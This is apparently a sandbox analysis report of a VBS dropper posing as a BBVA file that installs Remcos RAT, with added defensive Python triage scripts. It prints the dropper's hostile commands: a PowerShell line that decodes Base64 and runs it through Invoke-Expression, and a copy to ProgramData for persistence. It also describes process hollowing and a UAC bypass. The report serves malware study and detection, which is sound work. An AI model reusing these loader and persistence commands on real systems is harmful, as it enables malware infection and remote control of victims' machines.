                                                        Data Ascii: NPMD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwD
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54 75 2b 4d 72
                                                        Data Ascii: 5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+Mr
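The paste.ee response above is chunked (Transfer-Encoding: chunked), and the first body chunk opens with the hex size line 3832 (0x3832 = 14386 bytes) followed by the data; the capture then stops partway through. Reassembling such a body from the hex dumps is the first step before the payload can be decoded. The Python below is an added example, not part of the Joe Sandbox report: a chunked-body decoder that keeps whatever it recovered when the capture ends mid-chunk, plus a Base64-alphabet ratio check of the kind used to flag text-paste payloads. The sample body is constructed; it reuses only the chunk size from the capture and its contents are stand-in text, not the real paste.ee payload.

```python
import string

# Bytes allowed in a Base64 text: letters, digits, '+', '/', and '=' padding.
B64_ALPHABET = frozenset((string.ascii_letters + string.digits + "+/=").encode())


def parse_chunked(body: bytes):
    """Reassemble an HTTP/1.1 chunked message body.

    Returns (payload, chunk_sizes, complete). `complete` is False when the
    data ends before the terminating zero-length chunk, which is what a
    sandbox capture cut off mid-transfer looks like; whatever was recovered
    is still returned so it can be examined.
    """
    payload = bytearray()
    sizes = []
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol == -1:
            return bytes(payload), sizes, False            # no size line left to read
        size_field = body[pos:eol].split(b";", 1)[0].strip()  # ignore chunk extensions
        try:
            size = int(size_field, 16)                      # chunk sizes are hex ("3832" = 14386)
        except ValueError as exc:
            raise ValueError(f"bad chunk-size line at offset {pos}: {size_field!r}") from exc
        pos = eol + 2
        if size == 0:
            return bytes(payload), sizes, True             # last-chunk marker reached
        chunk = body[pos:pos + size]
        payload += chunk
        sizes.append(size)
        if len(chunk) < size:
            return bytes(payload), sizes, False            # capture truncated inside this chunk
        pos += size + 2                                     # step over the CRLF after the data


def base64_alphabet_ratio(data: bytes) -> float:
    """Fraction of bytes drawn from the Base64 alphabet; 1.0 for a pure Base64 blob."""
    if not data:
        return 0.0
    return sum(b in B64_ALPHABET for b in data) / len(data)


# Constructed sample (not the real paste.ee content): a single chunk whose
# size line "3832" matches the capture above, filled with stand-in
# Base64-alphabet text, then the terminating zero-length chunk.
SAMPLE_TAIL = b"wD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5"
SAMPLE_CHUNK = b"A" * (0x3832 - len(SAMPLE_TAIL)) + SAMPLE_TAIL
SAMPLE_BODY = b"3832\r\n" + SAMPLE_CHUNK + b"\r\n0\r\n\r\n"
# The same stream cut off 5000 bytes into the chunk, as a truncated capture would be.
SAMPLE_TRUNCATED = SAMPLE_BODY[:len(b"3832\r\n") + 5000]


if __name__ == "__main__":
    for label, body in (("complete", SAMPLE_BODY), ("truncated", SAMPLE_TRUNCATED)):
        payload, sizes, complete = parse_chunked(body)
        print(f"{label}: chunks={[hex(s) for s in sizes]} recovered={len(payload)} "
              f"complete={complete} base64_ratio={base64_alphabet_ratio(payload):.2f}")
```

The recovered bytes are deliberately not Base64-decoded here: a paste-hosted payload may be stored transformed (the capture above shows a long run of "A" before the first varied characters), and which transformation applies has to be taken from the decoded loader script, not guessed from the blob.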



                                                        Target ID:0
                                                        Start time:08:30:02
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs"
                                                        Imagebase:0x7ff6327e0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:08:30:06
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:08:30:06
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:08:30:34
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs"
                                                        Imagebase:0x7ff66ede0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:08:30:34
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:08:30:36
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wscript.exe C:\ProgramData\haematachometer.vbs
                                                        Imagebase:0x7ff6327e0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:08:30:38
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                        Imagebase:0xaa0000
                                                        File size:56'368 bytes
                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2896720400.0000000002C1F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:08:30:40
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:08:30:40
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:19
                                                        Start time:08:31:15
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs"
                                                        Imagebase:0x120000
                                                        File size:147'456 bytes
                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:08:31:15
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                        Imagebase:0x440000
                                                        File size:56'368 bytes
                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:08:31:15
                                                        Start date:17/12/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                        Imagebase:0xb40000
                                                        File size:56'368 bytes
                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.2876508990.0000000001248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Has exited:true
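The process entry above shows the pattern worth hunting for on endpoints: a .NET Framework build utility (aspnet_compiler.exe) started with nothing but its own path on the command line, running as a 32-bit image, and later matching the Remcos, keylogger and CMSTP UAC-bypass Yara rules in its own memory. The following is an added example, not code from the Joe Sandbox report, that turns that observation into a triage rule over constructed Sysmon-style process-creation events; the field names, the sample events, the script-host parent list and the reason strings are assumptions of the example.

```python
"""Process-creation triage for hollowed .NET Framework utilities.

Added example, not part of the Joe Sandbox report. It replays the entry
above (aspnet_compiler.exe started with a bare command line and later
matching the Remcos Yara rules in memory) against constructed Sysmon-style
process-creation events. The event field names, the sample events, the
script-host parent list and the reason strings are assumptions of this
example, not values taken from the report.
"""
import re
from typing import Dict, List, Optional, Tuple

# Build utility observed as the injection host in this report. Only this name
# is supported by the page; extend the set from your own telemetry.
HOLLOW_HOSTS = {"aspnet_compiler.exe"}

# Genuine location: <drive>:\Windows\Microsoft.NET\Framework[64]\v<version>\<name>
FRAMEWORK_DIR_RE = re.compile(
    r"^[a-z]:\\windows\\microsoft\.net\\framework(64)?\\v[0-9.]+\\[^\\]+$", re.I)

# Parents that are unusual for a precompilation step (assumption of this example).
SCRIPT_HOST_PARENTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}


def split_cmdline(cmdline: str) -> Tuple[str, str]:
    """Return (image, arguments) for a Windows command line.

    The image is a double-quoted path or the first whitespace token; the rest
    is the argument string, which is empty for a bare launch like the one above.
    """
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            return s[1:], ""
        return s[1:end], s[end + 1:].strip()
    head, _, rest = s.partition(" ")
    return head, rest.strip()


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(ev: Dict[str, str]) -> Optional[List[str]]:
    """Return the reasons an event is suspicious, or None if it is not flagged."""
    image = ev.get("Image", "")
    if basename(image) not in HOLLOW_HOSTS:
        return None
    reasons: List[str] = []
    if not FRAMEWORK_DIR_RE.match(image):
        reasons.append("image is not in the .NET Framework directory")
    _, args = split_cmdline(ev.get("CommandLine", ""))
    if args == "":
        # aspnet_compiler.exe compiles nothing without -v/-p/target arguments;
        # in the report the bare process hosted the injected Remcos image.
        reasons.append("bare command line (no compiler arguments)")
    parent = basename(ev.get("ParentImage", ""))
    if parent in SCRIPT_HOST_PARENTS:
        reasons.append(f"spawned by script host {parent}")
    return reasons or None


def triage_events(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (ProcessId, reasons) for every flagged event, in input order."""
    hits = []
    for ev in events:
        reasons = triage_event(ev)
        if reasons:
            hits.append((ev["ProcessId"], reasons))
    return hits


# Constructed Sysmon Event ID 1 style records. The first mirrors the report's
# process (Target ID 21); its parent is left out because this section does not
# record one. The other two are invented for contrast.
SAMPLE_EVENTS = [
    {"ProcessId": "4021",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"'},
    {"ProcessId": "1001",  # legitimate precompile driven by MSBuild
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"'
                    r" -v / -p C:\build\site C:\build\out",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"},
    {"ProcessId": "1002",  # copied out of the Framework directory, launched bare by a script host
     "Image": r"C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe"',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
]

if __name__ == "__main__":
    for pid, reasons in triage_events(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

The bare-command-line check alone reproduces the hit on this report's process; the path and parent checks are there to raise severity when the same binary has been copied elsewhere or is started by a script interpreter. Tune the threshold on your own build-server telemetry before alerting on it.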


                                                          Execution Graph

                                                          Execution Coverage:1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:4.1%
                                                          Total number of Nodes:531
                                                          Total number of Limit Nodes:19
execution_graph (interactive node/edge widget; the raw node dump is omitted). CRT startup (4339be: IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter/UnhandledExceptionFilter, GetStartupInfoW) leads into 40d767, the payload's main routine. From there the graph shows: 41bce3 resolving imports with LoadLibraryA/GetModuleHandleA and GetProcAddress; GetModuleFileNameW; 40e168 reading an embedded resource (FindResourceA, LoadResource, LockResource, SizeofResource); repeated RegOpenKeyExA/RegQueryValueExA/RegCloseKey lookups (4124b7, 40697b, 41265d, 41246e); CreateMutexA/GetLastError (40bed7); CreateProcessA (4069ba); StrToIntA; seven CreateThread sites (40dd65, 40de8b, 40dedf, 40df5b, 40dfd7, 40dff8, 40e00d); a DeleteFileW retry loop with Sleep (40e0c5-40e0ed); RegOpenKeyExW/RegDeleteValueW (41297a); and GetModuleHandleW on the return path. A separate socket teardown node (4047eb) uses WaitForSingleObject, SetEvent, CloseHandle and closesocket around critical-section calls. CRT exit (442554) calls GetPEB, GetCurrentProcess/TerminateProcess and ExitProcess; the CRT's delay-load helpers use GetModuleHandleExW, LoadLibraryExW, GetProcAddress and FreeLibrary.

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                          • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleLibraryLoadModule
                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                          • API String ID: 384173800-625181639
                                                          • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                          • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                          • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                          • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
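The APIs list for 0041BCE3 is the payload resolving its working set at run time: LoadLibraryA or GetModuleHandleA for a DLL name, then GetProcAddress for a function name, so none of these imports appear in the PE import table and the names only exist as ANSI strings in the unpacked image (the memory dump named under Memory Dump Source). That makes the string set itself a triage artefact. The following added example, not code from the report or from Joe Security, scores a byte blob against that set; the DLL and API names are copied from the list above, while the two sample blobs, the 0.6 coverage threshold and the whole-identifier matching rule are choices of this example.

```python
"""String triage for the import set that 0041BCE3 resolves at run time.

Added example, not part of the Joe Sandbox report. The DLL and API names are
taken from the APIs list above; the two sample blobs, the 0.6 coverage
threshold and the word-boundary matching rule are choices of this example.
"""
import re
from typing import Dict, List

# DLL -> API names looked up through LoadLibraryA/GetModuleHandleA + GetProcAddress.
# Shlwapi is resolved by ordinal (0000000C, i.e. 12) and leaves no name string,
# so it is deliberately absent from this table.
DYNAMIC_IMPORTS: Dict[str, List[str]] = {
    "psapi":    ["GetProcessImageFileNameW"],
    "kernel32": ["GlobalMemoryStatusEx", "IsWow64Process", "GetComputerNameExW",
                 "SetProcessDEPPolicy", "GetSystemTimes", "GetConsoleWindow"],
    "shcore":   ["SetProcessDpiAwareness"],   # looked up in shcore and again in user32 above
    "user32":   ["EnumDisplayDevicesW", "EnumDisplayMonitors", "GetMonitorInfoW"],
    "ntdll":    ["NtUnmapViewOfSection", "NtSuspendProcess", "NtResumeProcess"],
    "shell32":  ["IsUserAnAdmin"],
    "iphlpapi": ["GetExtendedTcpTable", "GetExtendedUdpTable"],
}
ALL_NAMES = sorted({n for names in DYNAMIC_IMPORTS.values() for n in names})

# Names that, by themselves, point at process manipulation rather than the
# system-inventory lookups (memory, monitors, socket tables) in the rest of the set.
PROCESS_CONTROL = {"NtUnmapViewOfSection", "NtSuspendProcess", "NtResumeProcess"}


def has_name(blob: bytes, name: str) -> bool:
    """Match the ANSI name as a whole identifier (GetProcAddress names are NUL-terminated)."""
    pattern = rb"(?<![A-Za-z0-9_])" + re.escape(name.encode()) + rb"(?![A-Za-z0-9_])"
    return re.search(pattern, blob) is not None


def triage(blob: bytes, threshold: float = 0.6) -> dict:
    """Score a memory dump (or unpacked image) against the resolved-import set."""
    found = {n for n in ALL_NAMES if has_name(blob, n)}
    per_dll = {dll: sorted(found & set(names))
               for dll, names in DYNAMIC_IMPORTS.items() if found & set(names)}
    coverage = round(len(found) / len(ALL_NAMES), 2)
    control = sorted(found & PROCESS_CONTROL)
    return {
        "found": sorted(found),
        "per_dll": per_dll,
        "coverage": coverage,
        "process_control": control,
        # Flag only when most of the set is present AND a process-control primitive is among it.
        "suspicious": coverage >= threshold and bool(control),
    }


def _table(names: List[str]) -> bytes:
    """Lay strings out NUL-terminated, the way they sit in the dumped image."""
    return b"\x00".join(n.encode() for n in names) + b"\x00"


# Constructed blobs. The first mirrors the string table behind the APIs list
# (15 of the 17 names); the second imitates a benign system monitor.
REMCOS_LIKE = b"MZ\x90\x00" + b"\xcc" * 32 + _table([
    "Psapi", "GetProcessImageFileNameW", "Kernel32", "kernel32", "shcore", "user32",
    "SetProcessDpiAwareness", "ntdll", "NtUnmapViewOfSection", "GlobalMemoryStatusEx",
    "IsWow64Process", "GetComputerNameExW", "Shell32", "IsUserAnAdmin",
    "EnumDisplayDevicesW", "EnumDisplayMonitors", "GetMonitorInfoW", "GetSystemTimes",
    "Shlwapi", "NtSuspendProcess", "NtResumeProcess", "Iphlpapi",
    "GetExtendedTcpTable", "GetExtendedUdpTable",
]) + b"\x00" * 16
BENIGN_MONITOR = _table([
    "kernel32", "GetSystemTimes", "GlobalMemoryStatusEx",
    "user32", "EnumDisplayMonitors", "GetMonitorInfoW", "NtSuspendProcessEx",
])

if __name__ == "__main__":
    for label, blob in (("remcos-like", REMCOS_LIKE), ("benign monitor", BENIGN_MONITOR)):
        print(label, triage(blob))
```

Run it against the dumped region (the .sdmp file listed under Memory Dump Source), not against the VBS dropper: the dropper carries the payload encoded, so the names are only present once the image is unpacked in aspnet_compiler.exe. The coverage score alone is weak evidence, since half of the set is ordinary inventory code; the combination with NtUnmapViewOfSection and NtSuspendProcess/NtResumeProcess is what separates this import set from a monitoring tool, and the same name list translates directly into a Yara rule for the dumped image.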

                                                          Control-flow Graph

control_flow_graph 442554 (executed/not-executed colouring lost in extraction):
• 442554-442560: call 447973 -> 442562 or 442582
• 442562-442570: GetPEB -> 442572 or 442582
• 442572-44257c: GetCurrentProcess, TerminateProcess -> 442582
• 442582-44258e: call 4425d9, ExitProcess
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                          • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                          • ExitProcess.KERNEL32 ref: 0044258E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
